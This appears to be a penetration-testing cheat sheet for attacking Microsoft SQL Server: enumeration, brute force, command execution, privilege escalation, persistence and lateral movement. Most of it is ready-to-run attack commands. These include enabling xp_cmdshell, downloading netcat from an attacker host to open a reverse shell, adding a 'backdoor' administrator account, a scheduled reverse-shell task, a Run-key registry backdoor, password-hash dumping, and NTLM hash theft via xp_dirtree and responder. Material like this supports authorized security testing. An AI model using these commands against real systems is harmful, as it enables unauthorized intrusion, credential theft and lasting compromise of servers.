Enumeration
Core Concept
Enumerate Microsoft SQL Server services to identify users, roles, permissions, databases, and execution capabilities to prepare for exploitation.
πΉ In β Gaining Initial Foothold β Credential Access
πΈ Automatic Enumeration Nmap Scripts
nmap -sV -p1433 --script \
ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes \
--script-args mssql.instance-port=1433,mssql.username=sa,mssql.password= \
<target-ip>| Modifier | Description |
|---|---|
-sV | Detects service version information on the target port |
-p1433 | Scans only TCP port 1433 (default MSSQL port) |
--script | Specifies NSE scripts to run during the scan |
ms-sql-info | Collects general information about the SQL server instance |
ms-sql-empty-password | Attempts login using empty password for known users |
ms-sql-xp-cmdshell | Checks if xp_cmdshell can be used for command execution |
ms-sql-config | Queries database configuration settings |
ms-sql-ntlm-info | Retrieves NTLM authentication data if possible |
ms-sql-tables | Lists all user tables in accessible databases |
ms-sql-hasdbaccess | Shows which databases the user can access |
ms-sql-dac | Detects support for Dedicated Administrator Connection (DAC) |
ms-sql-dump-hashes | Tries to extract login names and password hashes |
--script-args | Supplies custom arguments to scripts |
mssql.instance-port=1433 | Specifies the port where the MSSQL service is running |
mssql.username=sa | Uses the sa user for authentication |
mssql.password= | Attempts login with a blank password |
πΈ Metasploit Modules
use auxiliary/scanner/mssql/mssql_ping # Identifies MSSQL instances and gathers basic information such as server name, domain, and instance name.
use auxiliary/admin/mssql/mssql_enum # Performs enumeration of databases, configurations, roles, and privileges.
use auxiliary/admin/mssql/mssql_enum_sql_logins # Lists SQL logins on the server, including user types and status.
use auxiliary/scanner/mssql/mssql_hashdump # Extracts password hashes for SQL logins from the master database.
use admin/mssql/mssql_findandsampledata # Searches for and extracts sample data from accessible tables and columns.πΈ Manual Queries
SELECT SYSTEM_USER, USER_NAME(), IS_SRVROLEMEMBER('sysadmin');
SELECT @@version;
SELECT name FROM master.sys.databases;
SELECT * FROM sysobjects WHERE xtype='U';
SELECT * FROM sys.server_principals;
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');πΈ Bruteforce
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txtExecution
Core Concept
Achieve OS-level command execution on MSSQL using
xp_cmdshell, PowerShell payloads, and alternative procedures.
πΈ Through β Navigating Internals β Execution
πΈ Connect with Impacket
Impacket is a Python toolkit that provides low-level access to network protocols, including support for Microsoftβs Tabular Data Stream (TDS) used by MSSQL. The mssqlclient.py script allows authenticated interaction with a remote SQL Server, mimicking a SQL shell.
python3 mssqlclient.py DOMAIN/username@ip -windows-authDOMAIN/username@ip: Specify the domain and user (e.g., ACME/jdoe@10.10.10.10).-windows-auth: Enables Windows Authentication (e.g., NTLM).
This is typically used after credential discovery (via 13_Credential_Access or bruteforce). Once connected, you get an interactive SQL prompt where you can run queries or stored procedures like xp_cmdshell.
πΈ Enable xp_cmdshell
By default, many MSSQL servers disable the use of xp_cmdshell for security reasons. This extended stored procedure allows execution of system commands (like whoami, dir, or even launching payloads) directly from SQL.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;show advanced options: Unlocks access to advanced configuration features.xp_cmdshell: Enables the ability to run operating system commands.
Enabling this is a key post-exploitation step for turning SQL access into OS-level code execution.
πΈ Upload & Trigger Reverse Shell
Once xp_cmdshell is enabled, you can use it to download and execute a reverse shell binary such as nc64.exe (Netcat).
xp_cmdshell "powershell -c wget http://your.ip/nc64.exe -outfile C:\\nc.exe"
xp_cmdshell "C:\\nc.exe your.ip 443 -e cmd.exe"Step Breakdown:
-
File download: Uses PowerShell to download
nc64.exefrom your attack box (ensure youβre hosting withpython3 -m http.server). -
Execution trigger: Calls Netcat with
-e cmd.exeto spawn a shell and connect back to your listener (e.g.,nc -lvnp 443).
If this command works, youβll get a shell on your attacking machine with the privileges of the SQL Server service account.
πΈ Alternate Execution Paths
If xp_cmdshell is blocked or monitored, you can try other procedures:
| Stored Procedure | Description |
|---|---|
sp_OACreate | Instantiates COM objects; can execute commands via WScript.Shell (used for RCE). |
sp_start_job | Executes existing SQL Agent jobs. Jobs can be created to run OS commands if permissions allow. |
OPENROWSET | Reads data from external sources, including local files, if bulk permissions are available. |
xp_dirtree | Lists directories but can also trigger NTLM authentication, useful for stealing hashes via responder. |
These methods are valuable alternatives in environments where xp_cmdshell is restricted.
Privilege Escalation
Core Concept
Escalate privileges within Microsoft SQL Server using TRUSTWORTHY databases, impersonation rights, and sysadmin role abuse.
πΈ Through β Navigating Internals β Privilege Escalation
πΈ Trustworthy Database Exploitation
USE db_name;
CREATE PROCEDURE sp_elevate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'user', 'sysadmin';
EXEC sp_elevate;πΈ User Impersonation
SELECT b.name FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
EXECUTE AS LOGIN = 'sa';
REVERT;πΈ Metasploit Modules
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_dbownerπΈ PowerShell Scripts
Invoke-SqlServer-Escalate-ExecuteAs.psm1Invoke-SqlServer-ElevateDbOwner.psm1
Persistence
Core Concept
Maintain long-term access in SQL Server environments by creating scheduled tasks, startup procedures, registry edits, or new administrative users.
π» Out β Acting on Objectives β Persistence
πΈ Create User + Scheduled Task
xp_cmdshell "net user backdoor P@ss123 /add"
xp_cmdshell "net localgroup administrators backdoor /add"
xp_cmdshell "schtasks /create /sc minute /mo 5 /tn updater /tr 'cmd /c nc.exe ip 443 -e cmd.exe'"πΈ Registry Persistence
EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'backdoor', 'REG_SZ', 'cmd.exe /c start C:\\nc.exe'πΈ Startup Stored Procedures
- Create procedure in
masterDB - Mark as auto-start via
sp_procoption
πΈ CLR Assemblies
- Load custom .NET DLL to maintain code execution
Lateral Movement
Core Concept
Pivot across systems by abusing MSSQL linked servers and triggering NTLM authentication to leak or relay credentials.
πΈ Through β Navigating Internals β Lateral Movement
πΈ Discover & Abuse Linked Servers
EXEC sp_linkedservers;
EXEC ('xp_cmdshell whoami') AT [LinkedServer];πΈ Steal NetNTLM Hashes
EXEC xp_dirtree '\\attacker\\share'sudo responder -I tun0πΈ Tools
- Metasploit:
mssql_ntlm_stealer,mssql_linkcrawler mssqlpwner: NTLM relay, link enumeration